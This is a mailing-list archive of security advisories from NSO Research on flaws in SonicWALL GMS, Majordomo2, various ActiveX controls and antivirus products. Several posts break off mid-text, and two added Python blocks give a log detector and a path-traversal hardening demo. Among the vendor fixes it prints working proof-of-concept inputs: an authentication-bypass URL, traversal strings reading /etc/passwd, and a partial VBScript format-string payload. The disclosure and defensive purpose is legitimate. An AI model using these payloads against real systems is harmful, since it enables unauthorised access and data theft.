[Full-disclosure] NSOADV-2013-001: DELL SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/appliance/)

2013-01-17 Thread NSO Research
-- NSOADV-2013-001 ---

SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/appliance/)

  Title:              SonicWALL GMS/Viewpoint/Analyzer
                      Authentication Bypass (/appliance/)
  Severity:           Critical
  CVE-ID:             CVE-2013-1359
  CVSS Base Score:    10
    Impact:           10
    Exploitability:   10
    CVSS2 Vector:     AV:N/AC:L/Au:N/C:C/I:C/A:C
  Advisory ID:        NSOADV-2013-001
  Found Date:         2012-04-26
  Date Reported:      2012-12-13
  Release Date:       2013-01-17
  Author:             Nikolas Sotiriu
  Website:            http://sotiriu.de
  Twitter:            http://twitter.com/nsoresearch
  Mail:               nso-research at sotiriu.de
  URL:                http://sotiriu.de/adv/NSOADV-2013-001.txt
  Vendor:             DELL SonicWALL (http://www.sonicwall.com/)
  Affected Products:  GMS
                      Analyzer
                      UMA
                      ViewPoint
  Affected Platforms: Windows/Linux
  Affected Versions:  GMS/Analyzer/UMA 7.0.x
                      GMS/ViewPoint/UMA 6.0.x
                      GMS/ViewPoint/UMA 5.1.x
                      GMS/ViewPoint 5.0.x
                      GMS/ViewPoint 4.1.x
  Remote Exploitable: Yes
  Local Exploitable:  No
  Patch Status:       Vendor released a patch (See Solution)
  Discovered by:      Nikolas Sotiriu



Background:
===

The SonicWALL® Global Management System (GMS) provides organizations,
distributed enterprises and service providers with a powerful and
intuitive solution to centrally manage and rapidly deploy SonicWALL
firewall, anti-spam, backup and recovery, and secure remote access
solutions. Flexibly deployed as software, hardware, or a virtual
appliance, SonicWALL GMS offers centralized real-time monitoring, and
comprehensive policy and compliance reporting. For enterprise customers,
SonicWALL GMS streamlines security policy management and appliance
deployment, minimizing administration overhead. Service Providers can
use GMS to simplify the security management of multiple clients and
create additional revenue opportunities. For added redundancy and
scalability, GMS can be deployed in a cluster configuration.

(Product description from Website)



Description:


DELL SonicWALL GMS/Analyzer/ViewPoint contains a vulnerability that
allows an unauthenticated, remote attacker to bypass the web interface
authentication offered by the affected product.

The vulnerability is attributed to a built-in function that skips the
session check of the web application.

An attacker may exploit this vulnerability by sending a request
to the UMA interface (/appliance/) with the parameter
skipSessionCheck=1.

The attacker gains full administrative access to the interface and
could execute code with root or SYSTEM permissions, which leads to
a full compromise of the system.



Proof of Concept:
=

http://host/appliance/applianceMainPage?action=status&skipSessionCheck=1

The remote Root/System exploit
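As an added defensive example (not part of the advisory or of the SonicWALL product), the following Python detector scans web-server access logs for requests to the /appliance/ interface that carry the skipSessionCheck=1 parameter named above; the log lines, client addresses and timestamps are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines in combined log format; the source
# addresses, timestamps and response sizes are made up for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Jan/2013:10:01:02 +0100] "GET /appliance/applianceMainPage?action=status&skipSessionCheck=1 HTTP/1.1" 200 5120
10.0.0.6 - - [17/Jan/2013:10:01:09 +0100] "GET /appliance/login HTTP/1.1" 200 2048
10.0.0.7 - - [17/Jan/2013:10:02:14 +0100] "GET /appliance/applianceMainPage?skipSessionCheck=%31&action=status HTTP/1.1" 200 5120
10.0.0.8 - - [17/Jan/2013:10:03:30 +0100] "POST /sgms/auth HTTP/1.1" 302 0
10.0.0.9 - - [17/Jan/2013:10:04:41 +0100] "GET /appliance/help?skipSessionCheck=0 HTTP/1.1" 200 900
"""

# One combined-format line: client, ident, user, [timestamp],
# "METHOD target PROTOCOL", status code.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def is_skip_session_check(target):
    """Return True if the request target addresses the /appliance/
    interface and carries skipSessionCheck=1.

    The path is percent-decoded before the prefix test, and parse_qs
    decodes parameter names and values, so percent-encoded spellings of
    the same request (e.g. %31 for the digit 1) are matched as well.
    """
    parts = urlsplit(target)
    path = unquote(parts.path)
    if not path.startswith('/appliance/'):
        return False
    params = parse_qs(parts.query, keep_blank_values=True)
    return '1' in params.get('skipSessionCheck', [])


def find_bypass_attempts(log_text):
    """Parse access-log text and return one dict per matching request.

    A 200 response to such a request suggests the session check really
    was skipped (an unpatched host); any other status is still worth
    reviewing as a probe.
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        if is_skip_session_check(m.group('target')):
            hits.append({
                'src': m.group('src'),
                'ts': m.group('ts'),
                'target': m.group('target'),
                'status': int(m.group('status')),
                'likely_success': m.group('status') == '200',
            })
    return hits


if __name__ == '__main__':
    for hit in find_bypass_attempts(SAMPLE_LOG):
        print('%(ts)s %(src)s -> %(target)s '
              '(HTTP %(status)d, likely_success=%(likely_success)s)' % hit)
```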

[Full-disclosure] NSOADV-2013-002: DELL SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/sgms/)

2013-01-17 Thread NSO Research
-- NSOADV-2013-002 ---

SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/sgms/)

  Title:              SonicWALL GMS/Viewpoint/Analyzer
                      Authentication Bypass (/sgms/)
  Severity:           Critical
  CVE-ID:             CVE-2013-1360
  CVSS Base Score:    9
    Impact:           8.5
    Exploitability:   10
    CVSS2 Vector:     AV:N/AC:L/Au:N/C:P/I:P/A:C
  Advisory ID:        NSOADV-2013-002
  Found Date:         2012-04-26
  Date Reported:      2012-12-13
  Release Date:       2013-01-17
  Author:             Nikolas Sotiriu
  Website:            http://sotiriu.de
  Twitter:            http://twitter.com/nsoresearch
  Mail:               nso-research at sotiriu.de
  URL:                http://sotiriu.de/adv/NSOADV-2013-002.txt
  Vendor:             DELL SonicWALL (http://www.sonicwall.com/)
  Affected Products:  GMS
                      Analyzer
                      UMA
                      ViewPoint
  Affected Platforms: Windows/Linux
  Affected Versions:  GMS/Analyzer/UMA 7.0.x
                      GMS/ViewPoint/UMA 6.0.x
                      GMS/ViewPoint/UMA 5.1.x
                      GMS/ViewPoint 5.0.x
                      GMS/ViewPoint 4.1.x
  Remote Exploitable: Yes
  Local Exploitable:  No
  Patch Status:       Vendor released a patch (See Solution)
  Discovered by:      Nikolas Sotiriu



Background:
===

The SonicWALL® Global Management System (GMS) provides organizations,
distributed enterprises and service providers with a powerful and
intuitive solution to centrally manage and rapidly deploy SonicWALL
firewall, anti-spam, backup and recovery, and secure remote access
solutions. Flexibly deployed as software, hardware, or a virtual
appliance, SonicWALL GMS offers centralized real-time monitoring, and
comprehensive policy and compliance reporting. For enterprise customers,
SonicWALL GMS streamlines security policy management and appliance
deployment, minimizing administration overhead. Service Providers can
use GMS to simplify the security management of multiple clients and
create additional revenue opportunities. For added redundancy and
scalability, GMS can be deployed in a cluster configuration.

(Product description from Website)



Description:


DELL SonicWALL GMS/Analyzer/ViewPoint contains a vulnerability that
allows an unauthenticated, remote attacker to bypass the web interface
authentication offered by the affected product.

The vulnerability is attributed to broken session handling in the
password change process of the web application.

An attacker may exploit this vulnerability by sending a specially
crafted request to the SGMS interface (/sgms/).

The attacker gains full administrative access to the interface and
full control over all managed appliances, which could lead to a full
compromise of the organisation.



Proof of Concept :
==

Access the following URL to login to the sgms interface:

http://host/sgms/auth

[Full-disclosure] NSOADV-2011-003: Majordomo2 'help' Command Directory Traversal (Patch Bypass)

2011-03-08 Thread NSO Research
-- NSOADV-2011-003 ---

 Majordomo2 'help' Command Directory Traversal (Patch Bypass)

  Title:              Majordomo2 'help' Command Directory Traversal
  Severity:           Medium
  Advisory ID:        NSOADV-2011-003
  CVE:                CVE-2011-0063
  Found Date:         03.02.2011
  Date Reported:      03.02.2011
  Release Date:       19.02.2011
  Author:             Nikolas Sotiriu
  Mail:               nso-research at sotiriu.de
  Website:            http://sotiriu.de/
  Twitter:            http://twitter.com/nsoresearch
  Advisory-URL:       http://sotiriu.de/adv/NSOADV-2011-003.txt
  Vendor/Project:     http://www.mj2.org/
  Affected Products:  majordomo2 <= 20110203
  Remote Exploitable: Yes
  Local Exploitable:  No
  Patch Status:       Vendor released a patch (See Solution)
  Discovered by:      Nikolas Sotiriu
  Disclosure Policy:  http://sotiriu.de/policy.html
  Thanks to:          Thierry Zoller: For the permission to use his
                      Policy



Background:
===

Majordomo 2 is an upwardly-compatible rewrite of the popular majordomo
mailing list manager software by Jason Tibbitts and Michael Yount.



Description:


Majordomo2 <= 20110203 is affected by a directory traversal
vulnerability because the 'extra' parameter of the 'help' command is
not properly sanitized in the function '_list_file_get()'.

The original bug was made public on 03.02.2011 by Michael Brooks
of sitewat.ch:

https://sitewat.ch/en/Advisory/View/1
https://bugzilla.mozilla.org/show_bug.cgi?id=628064

I discovered that the patch, which has been in CVS since version
20110125, does not protect against the directory traversal bug.

https://bug628064.bugzilla.mozilla.org/attachment.cgi?id=506481

The diff builds in the regex '$file =~ s!/?\.\./?!!g;', which deletes
'../' from $file. Bypassing this regex is quite simple: use './.../'
instead of '../'.
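To show why the single-pass substitution from the patch can be spliced around, and what a containment check looks like instead, the following added Python example (not part of the advisory or of Majordomo2) reproduces the quoted Perl regex with re.sub and contrasts it with a normalise-then-check approach; the list file directory used is an assumed placeholder.

```python
import posixpath
import re

# The sanitiser from the 20110125 patch, '$file =~ s!/?\.\./?!!g;',
# reproduced in Python: one global pass that deletes an optional slash,
# two dots and an optional slash.  re.sub behaves like Perl's s///g here.
DOTDOT_RE = re.compile(r'/?\.\./?')


def patched_filter(extra):
    """Mimic the single-pass strip from the patch.

    Deleting a match splices the characters around it together, which
    can create a new '../' that the pass never revisits: in './.../'
    the match is '/..', and what remains is '.' + './' = '../'.
    """
    return DOTDOT_RE.sub('', extra)


def strip_until_stable(extra):
    """Repeat the same strip until nothing changes.

    Closes the splice bypass, but still rewrites input instead of
    rejecting it, so it is only shown for comparison.
    """
    while True:
        stripped = DOTDOT_RE.sub('', extra)
        if stripped == extra:
            return stripped
        extra = stripped


def hardened_resolve(base_dir, extra):
    """Resolve 'extra' below base_dir and refuse anything that escapes.

    No string rewriting: join, normalise the result as a POSIX path and
    check that it still lies inside base_dir.  Input such as './.../x'
    stays a (nonexistent) name inside base_dir instead of being turned
    into a traversal, and an absolute 'extra' (which posixpath.join
    would let replace base_dir) is rejected by the same test.
    base_dir is an assumed placeholder; the real directory is not on
    the page.
    """
    base = posixpath.normpath(base_dir)
    target = posixpath.normpath(posixpath.join(base, extra))
    if target != base and not target.startswith(base + '/'):
        raise ValueError('path escapes %s: %r' % (base, extra))
    return target


if __name__ == '__main__':
    sample = './..././..././.../etc/passwd'   # shape of the advisory's PoC
    print('patched filter :', patched_filter(sample))      # ../../../etc/passwd
    print('stable strip   :', strip_until_stable(sample))  # etc/passwd
    print('hardened       :', hardened_resolve('/var/lib/mj2/files', sample))
```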



Proof of Concept :
==

HTTP:
http://target/cgi-bin/mj_wwwusr?passw=list=GLOBALuser=func=help
extra=./..././..././..././..././..././..././..././.../etc/passwd

SMTP:
help ./..././..././..././..././..././..././..././.../etc/passwd



Solution:
=

Update to Majordomo2 >= 20110204

http://ftp.mj2.org/pub/mj2/snapshots/2011-02/majordomo-20110204.tar.gz



References:
===

Sitewatch Advisory: https://sitewat.ch/en/Advisory/View/1
Original Bug: https://bugzilla.mozilla.org/show_bug.cgi?id=628064
Patch Bypass: https://bugzilla.mozilla.org/show_bug.cgi?id=631307



Disclosure Timeline (YYYY/MM/DD):
=

2011.02.03: Patch bypass vulnerability found
2011.02.03: Informed security [at] mozilla.org
2011.02.03: Mozilla opened Bug 631307 in bugzilla
2011.02.03: Jason Tibbitts committed a fix (Sorry again)
2011.02.04: Snapshot available for download
2011.02.04: Discussed the public disclosure
2011.03.04: Got the bug bounty money
2011.03.08: Release of advisory






___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure

[Full-disclosure] NSOADV-2010-005: SonicWALL E-Class SSL-VPN ActiveX Control format string overflow

2010-08-19 Thread NSO Research

-- NSOADV-2010-005 ---

   SonicWALL E-Class SSL-VPN ActiveX Control format string overflow

  Title:              SonicWALL E-Class SSL-VPN ActiveX Control
                      format string overflow
  Severity:           High
  Advisory ID:        NSOADV-2010-005
  Found Date:         22.02.2010
  Date Reported:      09.06.2010
  Release Date:       19.08.2010
  Author:             Nikolas Sotiriu
  Website:            http://sotiriu.de
  Twitter:            http://twitter.com/nsoresearch
  Mail:               nso-research at sotiriu.de
  URL:                http://sotiriu.de/adv/NSOADV-2009-005.txt
  Vendor:             SonicWALL (http://www.sonicwall.com/)
  Affected Products:  SonicWALL SRA EX1600
                      SonicWALL EX7000
                      SonicWALL EX6000
                      SonicWALL EX-1600
                      SonicWALL EX-1500
                      SonicWALL EX-750
  Affected Versions:  10.0.4 and all previous versions
                      10.5.1 without hotfix
  Remote Exploitable: Yes
  Local Exploitable:  No
  Patch Status:       Vendor released a patch
  Discovered by:      Nikolas Sotiriu
  Disclosure Policy:  http://sotiriu.de/policy.html
  Thanks to:          Thierry Zoller: For the permission to use his
                      Policy



Background:
===

SonicWALL has added the award-winning Aventail SSL VPN  product line to
our E-Class SRA appliances. Aventail's best-of-breed SSL VPNs deliver
secure remote access to the most resources from the most end point
locations. Aventail was named in the Visionaries Quadrant in the SSL
VPN Magic Quadrant Report from Gartner, considered to be the leading
analyst firm covering the SSL VPN industry.

(Product description from Website)



Description:


Remote exploitation of a format string overflow vulnerability in the
End-Point Interrogator/Installer ActiveX Control could allow an attacker
to execute arbitrary code within the security context of the targeted
user.

The affected function is AuthCredential. The function
ConfigurationString also seems to be vulnerable, but there the format
string has to be base64 decoded.

Name:             End-Point Interrogator/Installer Module
Vendor:           Aventail Corporation
Type:             ActiveX-Control
Version:          10.3.42
Prog ID:          EPILib.EPInterrogator
GUID:             {2A1BE1E7-C550-4D67-A553-7F2D3A39233D}
File:             epi.dll
Folder:           %userprofile%\Application Data\Aventail\epi
Safe for Script:  True
Safe for Init:    True



Proof of Concept :
==

<html>
 <head>
  <title>SonicWALL E-Class SSL-VPN ActiveX Control DoS PoC</title>
 </head>
<body>
<pre>
<img src="http://sotiriu.de/images/logo_wh_80.png">

<input type="button" name="Submit" VALUE="Rule #5 – Shoot First">


</pre>

<object classid='clsid:2A1BE1E7-C550-4D67-A553-7F2D3A39233D'
id='obj'></object>

<script language='vbscript'>

Sub Submit_OnClick
eax=String(2, unescape("%u6161"))
arg="%1862x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%n"

[Full-disclosure] NSOADV-2010-008: AnNoText Third-Party ActiveX Control Buffer Overflow

2010-06-19 Thread NSO Research
-- NSOADV-2010-008 ---

AnNoText Third-Party ActiveX Control Buffer Overflow

  Title:              AnNoText Third-Party ActiveX Control Buffer
                      Overflow
  Severity:           Critical
  Advisory ID:        NSOADV-2010-008
  Found Date:         18.03.2010
  Date Reported:      25.03.2010
  Release Date:       11.06.2010
  Author:             Nikolas Sotiriu
  Mail:               nso-research at sotiriu.de
  Website:            http://sotiriu.de/
  Twitter:            http://twitter.com/nsoresearch
  Advisory-URL:       http://sotiriu.de/adv/NSOADV-2010-008.txt
  Vendor:             AnNoText (http://www.annotext.de/)
  Affected Products:  ADVOAkte 17 Build 4.8.0.116 Patchlevel 034
  Affected Component: KEYHELPLib ActiveX Control V.1.1.2200.0
  Remote Exploitable: Yes
  Local Exploitable:  No
  Patch Status:       unknown (No response from vendor)
  Discovered by:      Nikolas Sotiriu
  Disclosure Policy:  http://sotiriu.de/policy.html
  Thanks to:          Thierry Zoller: For the permission to use his
                      Policy



Background:
===

AnNoText is a German Company, which makes Software for lawyers.



Description:


During the installation of ADVOAkte an ActiveX Control is installed
(keyhelp.ocx) in which multiple functions are vulnerable to buffer
overflow bugs, which could lead to remote code execution.

Registered Classes:
+--

Name:             KeyPopup Class
Vendor:           KeyWorks Software
Type:             ActiveX-Control
Version:          1.1.2200.0
GUID:             {1E57C6C4-B069-11D3-8D43-00104B138C8C}
File:             keyhelp.ocx
Folder:           C:\WINDOWS\system32\
Safe for Script:  True
Safe for Init:    False


Name:             KeyScript Class
Vendor:           KeyWorks Software
Type:             ActiveX-Control
Version:          1.1.2200.0
GUID:             {45E66957-2932-432A-A156-31503DF0A681}
File:             keyhelp.ocx
Folder:           C:\WINDOWS\system32\
Safe for Script:  True
Safe for Init:    False


Name:             KeyHelp Embedded Window
Vendor:           KeyWorks Software
Type:             ActiveX-Control
Version:          1.1.2200.0
GUID:             {B7ECFD41-BE62-11D2-B9A8-00104B138C8C}
File:             keyhelp.ocx
Folder:           C:\WINDOWS\system32\
Safe for Script:  True
Safe for Init:    True



Proof of Concept :
==

http://sotiriu.de/software/NSOPOC-2010-008.zip

(coming soon)



Solution:
=

Disable the vulnerable ActiveX Control by setting the kill bit for the
following CLSIDs:

{1E57C6C4-B069-11D3-8D43-00104B138C8C}
{45E66957-2932-432A-A156-31503DF0A681}
{B7ECFD41-BE62-11D2-B9A8-00104B138C8C}

Save the following text as a .REG file and import it to set the kill bit
for these controls:

+--
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{1E57C6C4-B069-11D3-8D43-00104B138C8C}]
"Compatibility Flags"=dword:0400

[Full-disclosure] NSOADV-2010-009: AnNoText Third-Party ActiveX Control file overwrite vulnerability

2010-06-19 Thread NSO Research
-- NSOADV-2010-009 ---

  AnNoText Third-Party ActiveX Control file overwrite vulnerability

  Title:              AnNoText Third-Party ActiveX Control file
                      overwrite vulnerability
  Severity:           Low
  Advisory ID:        NSOADV-2010-009
  Found Date:         18.03.2010
  Date Reported:      25.03.2010
  Release Date:       11.06.2010
  Author:             Nikolas Sotiriu
  Mail:               nso-research at sotiriu.de
  Website:            http://sotiriu.de/
  Twitter:            http://twitter.com/nsoresearch
  Advisory-URL:       http://sotiriu.de/adv/NSOADV-2010-009.txt
  Vendor:             AnNoText (http://www.annotext.de/)
  Affected Products:  ADVOMahn Edition 21
  Affected Components: IDAutomation Linear BarCode V.1.6.0.6
                      IDautomation PDF417 Barcode V.1.6.0.6
  Remote Exploitable: Yes
  Local Exploitable:  No
  Patch Status:       unknown (No response from vendor)
  Discovered by:      Nikolas Sotiriu
  Disclosure Policy:  http://sotiriu.de/policy.html
  Thanks to:          Thierry Zoller: For the permission to use his
                      Policy



Background:
===

AnNoText is a German Company, which makes Software for lawyers.



Description:


During the installation of ADVOMahn two ActiveX Controls are installed
(IDAutomationLinear6.dll and IDAutomationPDF417_6.dll), in which the
functions SaveBarCode and SaveEnhWMF are vulnerable to a file overwrite
bug.

Controls:
+

Name:             IDAutomation Linear BarCode 1.606
Vendor:           IDAutomation.com Inc.
Type:             ActiveX-Control
Version:          1.6.0.6
GUID:             {0C3874AA-AB39-4B5E-A768-45F3CE6C6819}
File:             IDAutomationLinear6.dll
Folder:           C:\WINDOWS\system32\
Safe for Script:  True
Safe for Init:    True


Name:             IDautomation PDF417 Barcode
Vendor:           IDAutomation.com Inc.
Type:             ActiveX-Control
Version:          1.6.0.6
GUID:             {E97EE6EB-7FBE-43B1-B6D8-C4D86C78C5A0}
File:             IDAutomationPDF417_6.dll
Folder:           C:\WINDOWS\system32\
Safe for Script:  True
Safe for Init:    True



Proof of Concept :
==

http://sotiriu.de/software/NSOPOC-2010-009.zip

(coming soon)



Solution:
=

Disable the vulnerable ActiveX Controls by setting the kill bit for the
following CLSIDs:

{0C3874AA-AB39-4B5E-A768-45F3CE6C6819}
{E97EE6EB-7FBE-43B1-B6D8-C4D86C78C5A0}

Save the following text as a .REG file and import it to set the kill bit
for these controls:

+--
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0C3874AA-AB39-4B5E-A768-45F3CE6C6819}]
"Compatibility Flags"=dword:0400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{E97EE6EB-7FBE-43B1-B6D8-C4D86C78C5A0}]
"Compatibility Flags"=dword:0400

+--

More information about how to set the kill bit is available

[Full-disclosure] Security contact SonicWALL

2010-06-08 Thread NSO Research
Does anybody know the security contact for SonicWALL?



[Full-disclosure] NSOADV-2010-006: Authentium Command Free Scan ActiveX Control buffer overflow

2010-03-04 Thread NSO Research

-- NSOADV-2010-006 ---

Authentium Command Free Scan ActiveX Control buffer overflow

  Title:              Authentium Command On Demand ActiveX Control
                      Buffer Overflow
  Severity:           High
  Advisory ID:        NSOADV-2010-006
  Found Date:         15.02.2010
  Date Reported:      22.02.2010
  Release Date:       04.03.2010
  Author:             Nikolas Sotiriu
  Website:            http://sotiriu.de
  Twitter:            http://twitter.com/nsoresearch
  Mail:               nso-research at sotiriu.de
  URL:                http://sotiriu.de/adv/NSOADV-2009-006.txt
  Vendor:             Authentium (http://www.authentium.com/)
  Affected Products:  Authentium Command On Demand Online Scan
                      (http://www.commandondemand.com/)
  Affected Component: CSS Web Installer ActiveX V.1.4.9508.605
  Remote Exploitable: Yes
  Local Exploitable:  No
  Patch Status:       No Patch (See Solution)
  Discovered by:      Nikolas Sotiriu
  Disclosure Policy:  http://sotiriu.de/policy.html
  Thanks to:          Thierry Zoller: For the permission to use his
                      Policy



Background:
===

Authentium Command On Demand is a highly effective, totally free virus
scanner. Command on Demand scans for more than half a million Internet
threats, using definition files that are updated daily.

(Product description from Website)



Description:


Remote exploitation of a buffer overflow vulnerability in the Authentium
Command On Demand Online scanner service could allow an attacker to
execute arbitrary code within the security context of the targeted user.

The affected function is InstallProduct1. The functions
InstallProduct and InstallProduct2 seem to be vulnerable as well.

Name:             CSS Web Installer Class
Vendor:           Authentium, Inc.
Type:             ActiveX-Control
Version:          1.4.9508.605
Prog ID:          CSSWEBLib.Installer
GUID:             {6CCE3920-3183-4B3D-808A-B12EB769DE12}
File:             cssweb.dll
Folder:           C:\WINDOWS\Downloaded Program Files\
Safe for Script:  True
Safe for Init:    True
IObjectSafety:    False



Proof of Concept :
==

http://sotiriu.de/software/NSOPOC-2010-006.zip



Solution:
=
Product is no longer supported.

Disable the vulnerable ActiveX Control by setting the kill bit for the
following CLSID:

{6CCE3920-3183-4B3D-808A-B12EB769DE12}


Save the following text as a .REG file and import it to set the kill bit
for this control:

+--
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{6CCE3920-3183-4B3D-808A-B12EB769DE12}]
"Compatibility Flags"=dword:0400
+--

More information about how to set the kill bit is available in Microsoft
Support Document 240797 (http://support.microsoft.com/kb/240797).



Disclosure Timeline (YYYY/MM/DD):
=

2010.02.15: Vulnerability found
2010.02.22

[Full-disclosure] NSOADV-2010-004: McAfee LinuxShield remote/local code execution

2010-03-02 Thread NSO Research

NSOADV-2010-004: McAfee LinuxShield remote/local code execution

  Title:                  McAfee LinuxShield remote/local code
                          execution
  Severity:               Medium
  Advisory ID:            NSOADV-2010-004
  Found Date:             07.12.2009
  Date Reported:          05.02.2010
  Release Date:           02.03.2010
  Author:                 Nikolas Sotiriu (lofi)
  Website:                http://sotiriu.de
  Twitter:                http://twitter.com/nsoresearch
  Mail:                   nso-research at sotiriu.de
  URL:                    http://sotiriu.de/adv/NSOADV-2010-004.txt
  Vendor:                 McAfee (http://www.mcafee.com/)
  Affected Products:      McAfee LinuxShield <= 1.5.1
  Not Affected Products:  McAfee LinuxShield 1.5.1 with HF550192
  Remote Exploitable:     Yes (attacker must be authenticated)
  Local Exploitable:      Yes
  Patch Status:           Vendor released a patch (See Solution)
  Discovered by:          Nikolas Sotiriu
  Thanks to:              Thierry Zoller: For the permission to use his
                          Policy


Background:
===

LinuxShield detects and removes viruses and other potentially unwanted
software on Linux-based systems. LinuxShield uses the powerful McAfee
scanning engine — the engine common to all our anti-virus products.

Although a few years ago, the Linux operating system was considered a
secure environment, it is now seeing more occurrences of software
specifically written to attack or exploit security weaknesses in
Linux-based systems. Increasingly, Linux-based systems interact with
Windows-based computers. Although viruses written to attack Windows-
based systems do not directly attack Linux systems, a Linux server
can harbor these viruses, ready to infect any client that connects to
it.

When installed on your Linux systems, LinuxShield provides protection
against viruses, Trojan horses, and other types of potentially
unwanted software.

LinuxShield scans files as they are opened and closed — a technique
known as on-access scanning. LinuxShield also incorporates an
on-demand scanner that enables you to scan any directory or file in
your host at any time.

When kept up-to-date with the latest virus-definition (DAT) files,
LinuxShield is an important part of your network security. We
recommend that you set up an anti-virus security policy for your
network, incorporating as many protective measures as possible.

LinuxShield uses a web-browser interface, and a large number of
LinuxShield installations can be centrally controlled by ePolicy
Orchestrator.

(Product description from LinuxShield Product Guide)



Description:


This vulnerability allows remote attackers to execute arbitrary code
on vulnerable installations of McAfee LinuxShield. User interaction
is not required to exploit this vulnerability, but an attacker must
be authenticated.

The LinuxShield web interface communicates with the locally installed
nailsd daemon, which listens on port 65443/tcp, to make configuration
changes, query the configuration and execute tasks.

Each user who can log in to the victim box can also authenticate
itself

[Full-disclosure] NSOADV-2010-003: DATEV ActiveX Control remote command execution

2010-02-25 Thread NSO Research

NSOADV-2010-003: DATEV ActiveX Control remote command execution

  Title:              DATEV DVBSExeCall ActiveX Control remote
                      command execution
  Severity:           Critical
  Advisory ID:        NSOADV-2010-003
  CVE Number:         CVE-2010-0689
  Found Date:         11.01.2010
  Date Reported:      28.01.2010
  Release Date:       25.02.2010
  Author:             Nikolas Sotiriu
  Mail:               nso-research at sotiriu.de
  Website:            http://sotiriu.de/
  Twitter:            http://twitter.com/nsoresearch
  Advisory-URL:       http://sotiriu.de/adv/NSOADV-2010-003.txt
  Vendor:             DATEV (http://www.datev.de/)
  Affected Products:  DATEV Base System (Grundpaket Basis)
  Affected Component: DVBSExeCall Control ActiveX Control V.1.0.0.1
  Remote Exploitable: Yes
  Local Exploitable:  No
  Patch Status:       Vendor released a patch (See Solution)
  Discovered by:      Nikolas Sotiriu
  Disclosure Policy:  http://sotiriu.de/policy.html
  Thanks to:          Thierry Zoller: For the permission to use his
                      Policy



Background:
===

DATEV eG is a German Company, which makes Software for tax advisors and
lawyers.

The affected Base System has to be installed on all systems that
need DATEV Software.



Description:


During the installation of the DATEV Base System (Grundpaket Basis) an
ActiveX Control will be installed (DVBSExeCall.ocx), in which the
function ExecuteExe is vulnerable to a command execution bug.


Name:             ActiveX-Control zum Öffnen von LEXinform und der InfoDB
Vendor:           DATEV eG
Type:             ActiveX-Steuerelement
Version:          1.0.0.1
GUID:             {C1CF8B56-3147-41A2-B9BF-79437EED7AFC}
File:             DVBSExeCall.ocx
Folder:           C:\DATEV\PROGRAMM\HLPDVBS\
Safe for Script:  True
Safe for Init:    True
IObjectSafety:    False


NOTE: The affected ActiveX Control will be installed by any DATEV
  Software, so each system with a DATEV installation is vulnerable.



Proof of Concept :
==

Weaponized PoC demonstration video:
+--
http://sotiriu.de/demos/videos/nso-2010-003.html



Solution:
=

DATEV Advisory
+-
http://www.datev.de/info-db/1080162 (German)

Service-Release Paket V. 1.0
+---
http://www.datev.de/portal/ShowPage.do?pid=dp&inid=96550



Disclosure Timeline (YYYY/MM/DD):
=

2010.01.11: Vulnerability found
2010.01.25: Initial contact via online form
2010.01.26: Initial vendor response
2010.01.26: Asked for a PGP key and sent the disclosure policy to vendor.
[-] No response
2010.01.28: Asked if vendor received my last email.
2010.01.28: Vendor is unable to use PGP.
2010.01.28: Sent PoC, advisory, disclosure policy and planned disclosure
date (2010.02.11) to vendor
2010.01.29: Vendor acknowledges the reception of the advisory and starts
to develop a patch.
2010.02.02: Patch is finished. Vendor wishes to delay the release

[Full-disclosure] [UPDATE] NSOADV-2010-001: Panda Security Local Privilege Escalation

2010-01-20 Thread NSO Research
Security Advisory NSOADV-2010-001 (Version 2)
__
__


  Title:  Panda Security Local Privilege Escalation
  Severity:   Medium
  Advisory ID:NSOADV-2010-001
  Found Date: 02.2008
  Date Reported:  30.11.2009
  Release Date:   09.01.2010
  Update Date:20.01.2010
  Author: Nikolas Sotiriu (lofi)
  Website:http://sotiriu.de
  Mail:   nso-research at sotiriu.de
  URL:http://sotiriu.de/adv/NSOADV-2010-001.txt
  Vendor: Panda Security (http://www.pandasecurity.com/)
  Affected Products:  (Self tested)
  -Panda Security for Business 4.04.10
  -Panda Security for Business with Exchange
   4.04.10
  -Panda Security for Enterprise 4.04.10
  -Panda Internet Security 2010 (15.01.00)
  -Panda Global Protection 2010 (3.01.00)
  -Panda Antivirus Pro 2010 (9.01.00)
  -Panda Antivirus for Netbooks (9.01.00)

  (Provided by Panda)
  -Panda Global Protection 2009
  -Panda Internet Security 2009
  -Panda Antivirus Pro 2009
  -Panda Internet Security 2008
  -Panda Antivirus + Firewall 2008
  -Panda Platinum 2007 Internet Security
  -Panda Platinum 2006 Internet Security

  Affected Component: Corporate Products:
  -Panda Security for Desktops 4.05.10
  -Panda Security for File Servers 8.04.10

  Remote Exploitable: No
  Local Exploitable:  Yes
  Patch Status:   Vendor released a patch (See Solution)
  Discovered by:  Nikolas Sotiriu
  Disclosure Policy:  http://sotiriu.de/policy.html
  Thanks to:  Thierry Zoller: For the permission to use his
  Policy



Background:
===

Panda Security for Product is the security solution for companies that
need to protect their networks, mainly workstations and file servers.
Panda Security for Business is centrally managed thanks to the
AdminSecure Console, which allows monitoring the entire network,
protecting your critical assets against all types of threats and
optimizing productivity.

(Product description from Panda Website)

This vulnerability is similar to the following vulnerabilities in Panda
products, which were discovered earlier:

Sep 07 2006 3APA3A: http://www.securityfocus.com/bid/19891
Aug 02 2007 tarkus: http://www.securityfocus.com/bid/25186
Oct 31 2009 Protek: http://www.securityfocus.com/archive/1/507615
